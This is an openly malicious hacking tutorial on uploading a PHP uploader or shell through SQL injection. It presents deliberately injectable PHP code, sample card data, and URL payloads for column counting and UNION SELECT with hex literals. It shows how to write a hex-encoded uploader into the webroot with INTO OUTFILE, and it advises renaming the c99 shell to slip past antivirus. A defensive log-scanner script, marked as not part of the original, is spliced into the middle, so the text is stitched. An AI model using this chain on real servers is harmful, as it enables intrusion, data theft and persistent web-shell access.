Uploading PHP Shell Through SQL Injection

Filed under SQL Injection

Claimant – A little piece of advice

Article intended for any blackhat on the internet; all source code and examples must be used for malicious purposes only, sue me for that. Learn from this short piece of information how things work, 'cause we drift toward war... despite the fact that white hats also fight against us (reporting our fake pages and being prone to identify us to the feds), we can still win the struggle; despise the other side. With a scalpel in our hands we'll overcome the fucking security-revealing scandals around the world; inhale the white hat powder. Where do we fit into that? The best thing about this little piece of spam is that it appeals to our blackhat hearts.

Acknowledgement – encore!

I offer this paper to F3rG0, Dark_Side (we were going to give him a plaque, but due to his lack of skill and our lack of money, it's probably not going to happen), AciDmuD, VooDoo, Cheat Struck, dizziness, blurred vision, eye or muscle twitches and loss of consciousness 🙂 and especially to Cleidiane Morais for being in a good mood to love on a moonlit day ;) My nape hurts! The cheat in this paper works perfectly on Windows 7, Windows Vista, Windows XP, Windows 8 and 9 and so on (of course 😉). I will do this in steps for no readily apparent reason other than to give the reader motion and emotion... with no repentance it will be cool...
“The key to your success is acting before the problem escalates.”

Getting Started

Let's write an index page, or any simple page, that is vulnerable to SQL injection. Do a roaring trade (new employees...). Rename it roastbeef.php if you like.

— index.php —

<title>Index Vulnerable</title>
<body bgcolor="white">
<?php
// connection setup (mysql_connect / mysql_select_db for infobnk) is not shown in the original
$id = $_GET['id'];
print "Page vulnerable to SQL Injection (no scant) - Vulture Demonstration</br>";
print "==============================================<br>";
$sqlquery = "SELECT * FROM information WHERE id='$id'"; // user input concatenated straight into the query
echo "<b>SQL Query: </b>$sqlquery"."<br><br>";
$execute = mysql_query($sqlquery);

while ($row = mysql_fetch_array($execute)){
echo "<b>Name:</b> $row[1]</br><b>CC#:</b>$row[2]</br><b>Expiry date:</b>$row[3]</br>"; // line completed from the sample output shown later in the article
}
?>

— cut here —

Now let's create a database containing some useful data


Connecting to

Microsoft Windows [versão 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.
C:\Users\David>mysql -u root -p
Enter password: *********************
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.0.41-community-nt MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Creating the database

mysql> create database infobnk;
Query OK, 1 row affected (0.00 sec)
mysql> show databases\g
| Database |
| information_schema |
| infobnk |
| mysql |
| test |
4 rows in set (0.00 sec)
mysql> use infobnk\g
Query OK, 0 rows affected (0.00 sec)

Creating the table

mysql> create table information (id int, name TEXT, cc TEXT,
validade TEXT, rg TEXT);
Query OK, 0 rows affected (0.01 sec)
mysql> desc information\g
| Field | Type | Null | Key | Default | Extra |
| id | int(11) | YES | | NULL | |
| name | text | YES | | NULL | |
| cc | text | YES | | NULL | |
| validade | text | YES | | NULL | |
| rg | text | YES | | NULL | |
5 rows in set (0.00 sec)

Inserting data

mysql> insert into information values (1, "Tom Cruise", "Visa, Numero: 4011.3001.6089.7014", "10/2050", "18306148-x");
Query OK, 1 row affected (0.01 sec)
mysql> select * from infobnk.information where id=1\g
| id | name | cc | validade | rg |
| 1 | Tom Cruise | Visa, Numero: 4011.3001.6089.7014 | 10/2050 | 18306148-x |
1 row in set (0.00 sec)

As usual, insert some more data

mysql> select * from information\g
| id | name | cc | validade | rg |
| 1 | Tom Cruise | Visa, Numero: 4011.3001.6089.7014 | 10/2050 | 18306148-x |
| 2 | blah | blah | blah | blah |
2 rows in set (0.02 sec)

Seeing how the page works – (awkward situation)

Example II:


Page vulnerable to SQL Injection (no scant) – Vulture Demonstration

SQL Query: SELECT * FROM information WHERE id='2'
Name: blah
Expiry date:blah

Without using anything beyond URL manipulation we can change the data shown on the page. Now let's test the SQL injection proper.


You may have noticed that after we insert the apostrophe sign we have the following error message:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\Arquivos de programas\EasyPHP-5.3.1\www\index.php on line 21

That means we can have a little party here 🙂 Surprisingly we say "yeeeah". As you guys may have noticed, the main focus of this article isn't explaining how SQL injection works, but simply showing how to upload a PHP shell through it; still, I'll explain some basics to you, so let us continue the trek...

Try this too: http://localhost/?id=2'+or+1=1--+

Good spice! In the screenshot, the data corresponding to each id is surrounded with colored circles. That's a good crop. When talking about SQL injection, remember the SELECT statement.


As you may be tired of knowing, "SELECT is used to retrieve rows selected from one or more tables, and can include UNION statements and subqueries". For more information see reference [1]. What we need from this structure is the number of columns, which, as you know, matters for the UNION statement. So, let's find it right away:

http://localhost/?id=1'+order+by+1--+ No errors shown
http://localhost/?id=1'+order+by+4--+ Continue like that
http://localhost/?id=1'+order+by+5--+ Nothing in here
http://localhost/?id=1'+order+by+6--+ See the message below

OK, the table has 5 columns. So let's finally test the SELECT statement.

Hexadecimal Party

I have not personally seen this book, and I believe it may not be available (anymore); I simply "thought" of this method and it ran perfectly, so let us begin...

see this:


Instead of showing 414141 it showed AAAA, which means the server "interprets" the hex code when it is preceded by the hex specifier '0x'. Now think about "select into outfile", which in MySQL 3.23.55 and earlier could be used to create world-writeable files and allow mysql users to gain root privileges, by using the "SELECT * INTO OUTFILE" statement to overwrite a configuration file and cause mysql to run as root upon restart. Yes, we really can upload a PHP shell through the index page.

1 – Hex digits for the string AAAA
2 – Hex digits for the immortal Inconspicuous Uploader

As you can see, nothing is shown in field 1, because of the source code of this index page (the first column is never echoed, of course). For that reason I selected field 2. So we just need a shell, and to select its hex digits into a file inside the directory

boolean given in D:\Arquivos de programas\EasyPHP-5.3.1\www\

As you also know, 'www' is the directory where the web pages go... 😉 But it isn't so easy to get these hex digits for the shell 🙂 you may think... but I'm here to show you how it works. After clicking on 'Procurar...' (Browse...) you'll immediately be shown a file-selection window like the one below:

Select a file, in my case an image. After that, open it and click on 'Enviar arquivo' (Send file).

The message above is saying that:
O arquivo [5752199_300.jpg] foi enviado com sucesso.
The file has been uploaded successfully

Now let's test it, guys!

For some stupid reason I put the following path inside the PHP uploader:

$_path = "uploaded_files/";
change it to
$_path = "";

And sorry, I will not modify it any more at the time of this writing.

The Uploader

Now you'll have the source code able to upload files. It was written when I was a disgusting nicotine junkie. It works perfectly, and at least you don't have to go out and search for some shoddy source code containing the text "educational purposes only" and blah, blah, blah. Fuck ya white hat

mysql> select load_file('D:/uploader.php')\g

| load_file('D:/uploader.php')
(more trash)
<html><!-- Inconspicuous Uploader v2.5 by 6_Bl4ck9_f0x6 -->
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="2000000"/>
Arquivo local: <input name="arquivo_local" type="file"/><br/><br/>
<input type="submit" value="Enviar arquivo"/>
</form></html>
<?php
$_path = "uploaded_files/";
$_path = $_path.basename($_FILES['arquivo_local']['name']);
if (isset($_FILES['arquivo_local']['name'])) {
if(move_uploaded_file($_FILES['arquivo_local']['tmp_name'], $_path)) {
echo "O arquivo <b>[".basename($_FILES['arquivo_local']['name'])."]</b> foi enviado com sucesso.";
} else {
echo "Ocorreu um erro ao enviar o arquivo <b>[" . basename($_FILES['arquivo_local']['name'])."]</b> tente novamente.";
}
}
?>
1 row in set (0.00 sec)

Some little problems

OK, this uploader needs to become a hex string, but there's a little problem here; learn how to bypass it. You may ask "OK, there's a problem, but how does it affect the hex code?"

mysql> select load_file('D:/uploader.php') into outfile 'D:/output.txt'\g
Query OK, 1 row affected (0.00 sec)

As you could see in the video [1], there are some backslashes when we use the load_file() function; these sucky backslashes are always included when we process the uploader through load_file(), and the "blank spaces" between lines are filled with them. See:

mysql> select load_file('D:/uploader.php') into outfile
Query OK, 1 row affected (0.00 sec)

To avoid this annoying problem, just put all the code on a single line and process it after that:

<html><!-- Inconspicuous Uploader v2.5 by 6_Bl4ck9_f0x6 --><form enctype="multipart/form-data" action="uploader.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="2000000"/>Arquivo local: <input name="arquivo_local" type="file"/><br/><br/><input type="submit" value="Enviar arquivo"/></form></html><?php $_path = "uploaded_files/"; $_path = $_path.basename($_FILES['arquivo_local']['name']); if (isset($_FILES['arquivo_local']['name'])) { if(move_uploaded_file($_FILES['arquivo_local']['tmp_name'], $_path)) { echo "O arquivo <b>[".basename($_FILES['arquivo_local']['name'])."]</b> foi enviado com sucesso."; } else { echo "Ocorreu um erro ao enviar o arquivo <b>[" . basename($_FILES['arquivo_local']['name'])."]</b> tente novamente.";}}?>

Note that we must not leave line breaks (the "spaces" between lines) in the file; they cause the insertion of \, which may cause problems when executing the hex codes.

Give me the hex codes

To get our hex codes we'll use the MySQL function hex(), which converts the ASCII string to hex.

mysql> select hex(load_file('D:/uploader.php')) into outfile 'D:/output.hex'\g
Query OK, 1 row affected (0.01 sec)

See the hex codes:



Using Notepad you can't copy the last character, because it's a null byte.
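A defender-side counterpart to the whole procedure above (apostrophe test, ORDER BY column counting, UNION SELECT, 0x hex literals and INTO OUTFILE), added here as an example and not part of the original article: a small Python scanner that URL-decodes the query string of web-server log lines, flags those indicators, and decodes 0x literals so a hex-encoded <?php body is recognised instead of hidden behind hex digits. The log lines, client IP and webroot path are constructed placeholders, not data from the article.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original post), modelled on the probing the
# article walks through: quote test, ORDER BY counting, UNION with 0x literals, INTO OUTFILE.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?id=2' HTTP/1.1" 200 480
10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?id=1'+order+by+5--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?id=1'+union+select+1,0x41414141,3,4,5--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?id=1'+union+select+1,0x3c3f706870203f3e,3,4,5--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:06 +0000] "GET /index.php?id=1'+union+select+1,2,3,4,5+into+outfile+'PLACEHOLDER_WEBROOT/x.txt'--+ HTTP/1.1" 200 300
"""

# Indicators, checked against the URL-decoded query string.
INDICATORS = {
    "quote_probe":   re.compile(r"'\s*(?:or\b|and\b|order\b|union\b|--|$)", re.I),
    "order_by_enum": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "file_write":    re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "file_read":     re.compile(r"\bload_file\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.I)
MARKUP_MARKERS = (b"<?php", b"<?=", b"<form", b"<script")
REQUEST_RE = re.compile(r'"([^"]*)"')  # first quoted field of a combined-format log line

def decode_hex_literals(text):
    """MySQL reads 0x414141 as 'AAA'; decode each even-length 0x literal so it can be inspected."""
    return [bytes.fromhex(m.group(1)) for m in HEX_LITERAL.finditer(text)
            if len(m.group(1)) % 2 == 0]

def analyse_request(request_line):
    """Return the indicator names matched by one request line such as 'GET /p?id=1 HTTP/1.1'."""
    parts = request_line.split()
    decoded = unquote_plus(urlsplit(parts[1]).query) if len(parts) > 1 else ""
    findings = [name for name, pat in INDICATORS.items() if pat.search(decoded)]
    # A 0x literal that decodes to PHP or HTML is the article's "hexadecimal party" in action.
    if any(mk in blob.lower() for blob in decode_hex_literals(decoded) for mk in MARKUP_MARKERS):
        findings.append("hex_encoded_markup")
    return findings

def scan_log(text):
    """Return (line_number, findings) for every log line with at least one indicator."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        findings = analyse_request(m.group(1)) if m else []
        if findings:
            hits.append((number, findings))
    return hits
```

Run scan_log over a real access log to list the lines that carry these indicators; a quote probe alone is low confidence, while a decoded 0x literal containing <?php next to INTO OUTFILE is about as clear a signal as this technique leaves.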

The Spider Shell

Unfortunately the c99 is being detected by some antivirus and stupid "security" tools; for that reason write a simple shell yourself, or try renaming c99.php to cnineninex33l.php hhahahash! Stupid white hats, you worthless sack of pillow stuffing:


— Ending —
